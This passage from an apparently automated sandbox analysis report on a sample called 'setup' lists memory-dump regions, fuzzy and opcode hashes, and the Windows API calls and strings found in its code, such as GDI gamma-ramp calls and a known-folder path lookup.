                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CounterInfoPerformanceProcessQuerySizeStartupWorking
                                                                                                    • String ID: D
                                                                                                    • API String ID: 2251184149-2746444292
                                                                                                    • Opcode ID: 51fd4d2d6c274d6f388c730a1d4fed95442578329178293669cf54f63f624f70
                                                                                                    • Instruction ID: b7c760772572d297690a83bb802fca423dc97057364ed9ab5af0ee532ffbd5fb
                                                                                                    • Opcode Fuzzy Hash: 51fd4d2d6c274d6f388c730a1d4fed95442578329178293669cf54f63f624f70
                                                                                                    • Instruction Fuzzy Hash: 4841B2B53183428FDB218F29C49432ABBE1AFDA350F58493ED9C6D3391D634D5458B53
                                                                                                    Strings
                                                                                                    • Invalid window maximum size %ix%i, xrefs: 00246438
                                                                                                    • Invalid window minimum size %ix%i, xrefs: 00246418
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Invalid window maximum size %ix%i$Invalid window minimum size %ix%i
                                                                                                    • API String ID: 0-3225111338
                                                                                                    • Opcode ID: 9f4cc3cfd6abe5043cee6d44b0cf6271b0350bfa3bbf8e04f8915906fc18b88c
                                                                                                    • Instruction ID: eb281dbc09a714d40843562dea6bd27757ae57346a5327d8017a176558300f93
                                                                                                    • Opcode Fuzzy Hash: 9f4cc3cfd6abe5043cee6d44b0cf6271b0350bfa3bbf8e04f8915906fc18b88c
                                                                                                    • Instruction Fuzzy Hash: 4F412175519312CFC728CF19D58825ABBE0BF85724F148B2EF5A857290D3B19899CF83
                                                                                                    APIs
                                                                                                    • CreateDCW.GDI32 ref: 0024A445
                                                                                                    • GetDeviceGammaRamp.GDI32 ref: 0024A45B
                                                                                                    • DeleteDC.GDI32 ref: 0024A467
                                                                                                      • Part of subcall function 00242C70: calloc.MSVCRT ref: 00242C88
                                                                                                      • Part of subcall function 00242C70: calloc.MSVCRT ref: 00242C9A
                                                                                                      • Part of subcall function 00242C70: calloc.MSVCRT ref: 00242CAD
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: calloc$CreateDeleteDeviceGammaRamp
                                                                                                    • String ID: DISPLAY
                                                                                                    • API String ID: 2482751880-865373369
                                                                                                    • Opcode ID: b31750d3b2a532fa32cd381d88984083c8b2bbea3beea53599993ee3c76fa4e0
                                                                                                    • Instruction ID: 96a0ecd1dd72fde9578e5f4a9e04f141eddccf51275fae4092a4171bd4c2de56
                                                                                                    • Opcode Fuzzy Hash: b31750d3b2a532fa32cd381d88984083c8b2bbea3beea53599993ee3c76fa4e0
                                                                                                    • Instruction Fuzzy Hash: 01318F720047448FD720EF38D58939ABBE1FB85314F158A6DE9599B381C375940ACF82
                                                                                                    APIs
                                                                                                    • strerror.MSVCRT ref: 0028AF83
                                                                                                    • strlen.MSVCRT ref: 0028AF93
                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000000,?,?,00332727), ref: 0028AFFF
                                                                                                    Strings
                                                                                                    • basic_string::_M_construct null not valid, xrefs: 0028B00C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrerrorstrlen
                                                                                                    • String ID: basic_string::_M_construct null not valid
                                                                                                    • API String ID: 2955597728-3522614731
                                                                                                    • Opcode ID: 01de0189ff1e3779677d5391a8b93535e30b2aa92046938738ea45ba75093045
                                                                                                    • Instruction ID: b0a93f72d10c15536064cc7fa5834f9e2eb44ad60c4d7ae98579f7b5a8b93473
                                                                                                    • Opcode Fuzzy Hash: 01de0189ff1e3779677d5391a8b93535e30b2aa92046938738ea45ba75093045
                                                                                                    • Instruction Fuzzy Hash: BE1166B55193118FD711EF39C08021EFBE4AF9A340F04886EE988DB345EA31D859CBA2
                                                                                                    APIs
                                                                                                    • SHGetKnownFolderPath.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,001C744D), ref: 001C2340
                                                                                                    • CoTaskMemFree.OLE32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 001C2353
                                                                                                    • PathCchStripToRoot.API-MS-WIN-CORE-PATH-L1-1-0 ref: 001C2363
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Path$FolderFreeKnownRootStripTask
                                                                                                    • String ID: %ls
                                                                                                    • API String ID: 122202160-3246610740
                                                                                                    • Opcode ID: c09f3807b6376e7d6c721866e907c7fdda77f025ac88e97a99711c598b3f4332
                                                                                                    • Instruction ID: 1e10ccd4dc7a006a4affbe5c3fabfb81b05e3069e9edede2c2c222583bdc03b6
                                                                                                    • Opcode Fuzzy Hash: c09f3807b6376e7d6c721866e907c7fdda77f025ac88e97a99711c598b3f4332
                                                                                                    • Instruction Fuzzy Hash: 90119BB98093019FC701EF29D58960EBBF4FB89754F018A2EE89997312E735D944CF92
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                    • String ID: ADVAPI32.DLL$SystemFunction036
                                                                                                    • API String ID: 2574300362-1064046199
                                                                                                    • Opcode ID: 4949548600e2e0ec8c0f46f18fcf73c089ddeee9e821db3bf3e2fe9b5963168e
                                                                                                    • Instruction ID: ccaf35a3ba330c88d4a3ead0f0896511fd03c6bb1dab66de1e9ff3fa125826ca
                                                                                                    • Opcode Fuzzy Hash: 4949548600e2e0ec8c0f46f18fcf73c089ddeee9e821db3bf3e2fe9b5963168e
                                                                                                    • Instruction Fuzzy Hash: 860162F560C3048BE711AF789EC522B3AE0AB49304F444578D9C487312E7B0DD44DB52
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDeleteDeviceGammaRamp
                                                                                                    • String ID: DISPLAY
                                                                                                    • API String ID: 790129706-865373369
                                                                                                    • Opcode ID: ff9cae95c095b0e333f257773201fafe395c044be6819bd558e5a352d191e3a6
                                                                                                    • Instruction ID: 56d1edbc38f324fa8c23fda5aecc04170fdca4bf724937f454f317a305644450
                                                                                                    • Opcode Fuzzy Hash: ff9cae95c095b0e333f257773201fafe395c044be6819bd558e5a352d191e3a6
                                                                                                    • Instruction Fuzzy Hash: AE017CB28047048FD700EF68D44838EBBE1FFC5310F06896CE89997350DBB59948CB82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite$CloseHandle
                                                                                                    • String ID: \
                                                                                                    • API String ID: 975693313-2967466578
                                                                                                    • Opcode ID: 4b1e1ebb68ae1880b4d85041dfe3d94199a3003ef07f53da49f1ad1208f9666e
                                                                                                    • Instruction ID: 9464be71e4ce1a39008dc2cfb4386e2775547dd80415e940abc9eb1b3c16fef8
                                                                                                    • Opcode Fuzzy Hash: 4b1e1ebb68ae1880b4d85041dfe3d94199a3003ef07f53da49f1ad1208f9666e
                                                                                                    • Instruction Fuzzy Hash: AC0181B18087009FD7217F54ED8835EBFE0EB51305F05442DE98806211D3B9D4898B87
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitlongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2266059207-701587655
                                                                                                    • Opcode ID: 2ed077ea7d12da4b5fbb4ee2b516217122d47b81c7c59760580bfc77d4f078df
                                                                                                    • Instruction ID: 5461c7fae73bc0dd77ef0068956a2351c07c163db206dc31963130995b67267c
                                                                                                    • Opcode Fuzzy Hash: 2ed077ea7d12da4b5fbb4ee2b516217122d47b81c7c59760580bfc77d4f078df
                                                                                                    • Instruction Fuzzy Hash: 33018CB5828318DBC710AF24D44636EBBE0FF44355F01C82EE5D857282C7B89895DF82
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: exitlongjmp
                                                                                                    • String ID: %s$ERROR: can't alloc %lu memory bytes
                                                                                                    • API String ID: 2266059207-701587655
                                                                                                    • Opcode ID: 05c8260f5090ff290e77bf33a4daf68348b8d0f0190ec543995ed4403ef68a6a
                                                                                                    • Instruction ID: 9c3ae1e01b01c24c79995c31b3ecdc776f2c19eaebcb3877b64f2c6b3c768069
                                                                                                    • Opcode Fuzzy Hash: 05c8260f5090ff290e77bf33a4daf68348b8d0f0190ec543995ed4403ef68a6a
                                                                                                    • Instruction Fuzzy Hash: DE01F2B0909B14DFD302AF65D98522EBBE0BB44701F41982CE5C897212C7B49880CF96
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
